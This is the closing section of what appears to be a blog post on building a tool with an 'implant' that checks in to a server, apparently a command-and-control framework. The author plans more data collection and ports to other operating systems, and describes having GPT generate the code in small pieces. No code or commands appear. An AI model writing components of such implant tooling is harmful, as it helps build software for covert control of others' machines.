While taking a bus after writing this section, I realised that it might be worth my while writing some kind of webshit frontend - something I absolutely abhor doing. Maybe that will be a later post. I'll certainly be getting some kind of AI code generator to do that for me.
Conclusion of Part 1. Discussion of where we will go next.
At this point, I've written up enough for now, and touched upon a few ideas as to where we will go next.
The next steps will likely include addressing cryptography issues - by trial and mostly error. I'll probably have a few posts where I do the crypto wrong to show the "thought process". Even worse - I'll be getting GPT to write the crypto code where possible.
I'd originally planned to cover it (cryptography) in this post, but it was getting too long, and I wanted to publish before the end of the week, and due to only working on this during evenings and lunch breaks, didn't have time to really explore the cryptography stuff beyond writing down notes on it.
Beyond cryptography, I want to improve the API, discuss scaling issues/attacks, improve the user experience, fix some bugs, and about a thousand other things - improving what data it collects for check-in, porting the implant to other operating systems, etc.
Now, its time to talk about the GPT part a bit.
I noticed something interesting - the longer a "chat" goes on, the more likely it is to "lose context" and start emitting buggier code. Effectively - there is a limit on how "long" it can maintain state/context, basically a memory limit of sorts on how many tokens it can hold.
So you get better results asking it to do one specific, small task, and iterate on that specific, small task until its done - then hand assemble the components yourself.
Which is what we will do in future episodes.
So far though? I'm fairly happy with the GPT emitted code as a proof of concept. It isn't great, but it is also not terrible, and I got to spend more time thinking about design elements of the program than remembering how to do some vague thing.
In future, I think my approach of using GPT to write shit like this will be to locally write the program as pseudocode, come up with the functions/arguments/types needed, then in separate chat instances ask it to build out each part individually.
That way I can spend a lot of time reasoning about design, and not worry overmuch about implementation of a proof of concept.